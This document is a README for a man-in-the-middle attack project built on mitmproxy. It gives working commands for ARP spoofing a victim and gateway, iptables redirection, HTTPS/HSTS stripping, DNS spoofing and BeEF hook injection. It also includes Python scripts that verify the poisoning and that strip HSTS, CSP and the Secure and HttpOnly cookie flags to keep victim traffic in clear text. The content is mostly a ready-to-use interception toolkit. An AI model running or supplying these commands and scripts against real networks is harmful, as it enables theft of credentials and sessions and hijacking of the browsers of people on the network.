Repository housing my 'man in the middle' project built around mitmproxy (defeating HTTPS/HSTS, JS injection, DNS spoofing).
You can run the launcher script as follows:

Usage: ./ [-g] [-n] [-s] [-x] [-j <js payload url>] [-d] [-i <interface>] gateway_ip target_ip
       [-g] interactive mode for mitmproxy
       [-n] capture HTTP traffic
       [-s] capture HTTPS traffic
       [-x] strip HTTPS (downgrade https:// links and redirections)
       [-j] inject a JS payload served from <js payload url>
       [-d] DNS spoofing (dnsspoof + setoolkit)
       [-i] network interface to attack on

/!\ Works with mitmproxy v1.0. mitmproxy is downloaded and installed automatically.

Example command for full interception (HTTPS/HSTS stripping when possible, otherwise interception with upstream certificates):

sudo ./ -g -n -s -x -i wlan0

You can also inject a JavaScript payload (for example a BeEF hook):

sudo ./ -g -n -j -i wlan0

Or run a DNS spoofing attack (this starts dnsspoof and setoolkit):

sudo ./ -g -n -d -i wlan0

All of these features can of course be combined.

While intercepting traffic, the mitmproxy module also:

  • drops the request headers If-Modified-Since, Cache-Control and Upgrade-Insecure-Requests (so a cached 304 or a server-side upgrade to HTTPS cannot bypass the proxy);
  • drops the response headers Strict-Transport-Security, Public-Key-Pins, Content-Security-Policy, X-XSS-Protection and X-Frame-Options;
  • drops the Content-Security-Policy meta tag;
  • drops the Secure and HttpOnly cookie flags;
  • rewrites https:// links and redirections to http://.

The launcher script automates the following steps:

  • enable IP forwarding (traffic that is not redirected to the proxy, e.g. TLS connections when HTTPS capture is off, is routed through without interception):
sysctl -w net.ipv4.ip_forward=1
  • avoid sending undesirable ICMP redirect messages (they would tell the victim the real gateway's address):
echo 0 | sudo tee /proc/sys/net/ipv4/conf/*/send_redirects
  • configure NAT (8080 is mitmproxy's default listening port; wlan0 is the interface passed with -i):
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
  • and if you also want HTTPS capture:
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

The REDIRECT target rewrites the destination of packets and streams to the machine itself (the primary address of the incoming interface). This means we can, for example, REDIRECT all packets destined for the HTTP ports to a local HTTP proxy (transparent proxying), which is why mitmproxy is started in transparent mode (-T) below.

  • run ARP spoofing by calling arpspoof twice, once per direction, so that the victim and the gateway both resolve the other's IP to our MAC:
xterm -geometry 100x25+1+200 -hold -e arpspoof -t [ip victim] [ip route]
xterm -geometry 100x25+1+300 -hold -e arpspoof -t [ip route] [ip victim]

N.B.: the script can also try to force the ARP poisoning of some boxes.

  • check that the ARP poisoning works in both directions with:
python ./ [ip victim] [ip route]
  • run mitmproxy with our custom modules. The request-logging module logs only relevant POST requests (to log all traffic, use -a <logfilename>):
mitmproxy -T --anticache --host --anticomp --noapp --script "./ ./requests.log" --script ./ --eventlog

N.B.: mitmproxy (with option -w/-a for logging) dumps the whole flows in tnetstrings format.

You can also run mitmdump (same as mitmproxy, but non-interactive):

mitmdump -T --anticache --host --anticomp --noapp --quiet --script "./ ./requests.log" --script ./
  • if you additionally want to log the visited URLs to a file:
urlsnarf > ./urlsnarf.txt &
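The "check that the ARP poisoning works in both directions" step above is easy to get wrong: seeing some traffic is not enough, you want to see the victim's gateway-bound frames and the gateway's victim-bound frames both carrying your MAC, and none of them still going to the real peer. The following is an added example of such a check, not the repository's own check script. It classifies frames from a capture; the live_frames() helper, which needs scapy and root, is an assumed way of feeding it real traffic, and the frames and ARP table in the test are constructed.

```python
"""Added example (not the repository's check script): decide from a packet
capture whether ARP poisoning of victim and gateway works in both directions.
The classification works on plain Frame tuples so it runs offline; the
live_frames() helper (scapy, root) is an assumption about how to feed it."""
from collections import namedtuple

Frame = namedtuple("Frame", "src_mac dst_mac src_ip dst_ip")


def parse_proc_net_arp(text):
    """Parse the /proc/net/arp table format into {ip: mac} (MACs lower-cased).

    On the attacker the table holds the REAL MACs of victim and gateway,
    which is exactly what we need to recognise bypassing frames."""
    table = {}
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) >= 4 and fields[3] != "00:00:00:00:00:00":  # skip incomplete entries
            table[fields[0]] = fields[3].lower()
    return table


def check_poisoning(frames, victim_mac, gateway_mac, attacker_mac, victim_ip):
    """Count frames per direction and report whether each one goes through us.

    Victim side: frames the victim emits should carry the attacker's MAC
    (victim_via_us) and not the gateway's real MAC (victim_bypass).
    Gateway side: frames the gateway emits for the victim's IP should carry
    the attacker's MAC (gateway_via_us), not the victim's real MAC (gateway_bypass).
    Frames we send ourselves (src == attacker) are our own forwarding: ignored.
    Caveat: traffic the victim addresses to the attacker's own IP also counts
    as victim_via_us; filter it out if the attacker hosts services."""
    v, g, a = victim_mac.lower(), gateway_mac.lower(), attacker_mac.lower()
    counts = {"victim_via_us": 0, "victim_bypass": 0,
              "gateway_via_us": 0, "gateway_bypass": 0}
    for f in frames:
        src, dst = f.src_mac.lower(), f.dst_mac.lower()
        if src == v and dst == a:
            counts["victim_via_us"] += 1
        elif src == v and dst == g:
            counts["victim_bypass"] += 1
        elif src == g and f.dst_ip == victim_ip and dst == a:
            counts["gateway_via_us"] += 1
        elif src == g and f.dst_ip == victim_ip and dst == v:
            counts["gateway_bypass"] += 1
    # A direction is poisoned only if we saw it AND nothing slipped past us.
    counts["victim_poisoned"] = counts["victim_via_us"] > 0 and counts["victim_bypass"] == 0
    counts["gateway_poisoned"] = counts["gateway_via_us"] > 0 and counts["gateway_bypass"] == 0
    counts["both_ways"] = counts["victim_poisoned"] and counts["gateway_poisoned"]
    return counts


def live_frames(iface, victim_ip, gateway_ip, count=50, timeout=10):
    """Sniff IP frames involving victim or gateway with scapy (assumed usage, needs root)."""
    from scapy.all import sniff, Ether, IP      # lazy import: not needed offline
    bpf = "ip and (host %s or host %s)" % (victim_ip, gateway_ip)
    pkts = sniff(iface=iface, filter=bpf, count=count, timeout=timeout)
    return [Frame(p[Ether].src, p[Ether].dst, p[IP].src, p[IP].dst)
            for p in pkts if p.haslayer(Ether) and p.haslayer(IP)]


if __name__ == "__main__":
    import sys
    victim_ip, gateway_ip = sys.argv[1], sys.argv[2]
    iface = sys.argv[3] if len(sys.argv) > 3 else "wlan0"
    arp = parse_proc_net_arp(open("/proc/net/arp").read())
    attacker_mac = open("/sys/class/net/%s/address" % iface).read().strip()
    result = check_poisoning(live_frames(iface, victim_ip, gateway_ip),
                             arp[victim_ip], arp[gateway_ip], attacker_mac, victim_ip)
    print(result)
    sys.exit(0 if result["both_ways"] else 1)
```

Run it as `python check.py <ip victim> <ip route> [iface]` after the two arpspoof instances are up; a non-zero exit with gateway_bypass > 0 is the typical symptom of a gateway that ignores gratuitous ARP, in which case the poisoning only works towards the victim and return traffic never reaches the proxy.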

Now visit a website whose landing page is plain HTTP and click a link leading to a secure area. All traffic should stay in clear text between the victim and mitmproxy.
If you injected a BeEF hook with the -j option, also check that the browser shows up as hooked in your BeEF panel.
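What keeps that traffic in clear text is the custom mitmproxy module run in the steps above (the header, cookie-flag and https:// stripping listed under "While intercepting traffic"). The script below is an added example of such a module, not the repository's own code: the pure functions operate on plain (name, value) header lists and strings so they run without mitmproxy, and the request()/response() hooks at the bottom assume mitmproxy 1.x's inline-script hooks and its Headers API (iteration over names, del, get_all/set_all) plus flow.response.text. Note the "when possible" caveat from the example command: a browser that already holds an HSTS entry for the site, or has it preloaded, never sends the first request over HTTP, so there is nothing for this module to strip.

```python
"""Added example: a mitmproxy-style inline script implementing the header,
cookie-flag and https:// stripping listed in the README. Not the repository's
own module. The pure functions run without mitmproxy; request()/response()
assume mitmproxy 1.x's hooks and Headers API (assumption, see lead-in)."""
import re

# Header names from the README's two lists, compared case-insensitively.
DROPPED_REQUEST_HEADERS = {"if-modified-since", "cache-control",
                           "upgrade-insecure-requests"}
DROPPED_RESPONSE_HEADERS = {"strict-transport-security", "public-key-pins",
                            "content-security-policy", "x-xss-protection",
                            "x-frame-options"}

COOKIE_FLAG_RE = re.compile(r";\s*(secure|httponly)\b", re.IGNORECASE)
META_CSP_RE = re.compile(
    r"<meta[^>]+http-equiv\s*=\s*[\"']?content-security-policy[\"']?[^>]*>",
    re.IGNORECASE)
HTTPS_RE = re.compile(r"https://", re.IGNORECASE)


def drop_headers(headers, dropped):
    """Return the (name, value) list without the headers named in `dropped`."""
    return [(n, v) for n, v in headers if n.lower() not in dropped]


def strip_cookie_flags(set_cookie):
    """Remove the Secure and HttpOnly attributes from one Set-Cookie value."""
    return COOKIE_FLAG_RE.sub("", set_cookie)


def strip_html(body):
    """Drop <meta http-equiv="Content-Security-Policy"> tags and downgrade https:// links."""
    return HTTPS_RE.sub("http://", META_CSP_RE.sub("", body))


def downgrade_response(headers, body):
    """Apply every response-side rewrite; returns (headers, body)."""
    out = []
    for n, v in drop_headers(headers, DROPPED_RESPONSE_HEADERS):
        if n.lower() == "set-cookie":
            v = strip_cookie_flags(v)
        elif n.lower() == "location":          # downgrade redirections too
            v = HTTPS_RE.sub("http://", v)
        out.append((n, v))
    return out, strip_html(body)


# --- mitmproxy hooks (assumed API, see lead-in) ---------------------------
def request(flow):
    """Drop request headers that would let a cached or upgraded answer bypass us."""
    for name in list(flow.request.headers):
        if name.lower() in DROPPED_REQUEST_HEADERS:
            del flow.request.headers[name]


def response(flow):
    """Apply the same rewrites as downgrade_response() to a live flow."""
    h = flow.response.headers
    cookies = [strip_cookie_flags(c) for c in h.get_all("set-cookie")]
    for name in list(h):
        if name.lower() in DROPPED_RESPONSE_HEADERS:
            del h[name]
    if cookies:
        h.set_all("set-cookie", cookies)
    if "location" in h:
        h["location"] = HTTPS_RE.sub("http://", h["location"])
    if "text/html" in h.get("content-type", ""):
        flow.response.text = strip_html(flow.response.text)
```

Load it with `--script ./strip.py` next to the logging module; keeping the rewrites in pure functions is what lets you unit-test the regexes against real Set-Cookie and HTML samples before pointing a victim at the proxy.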

Don't hesitate to contribute to all of these modules.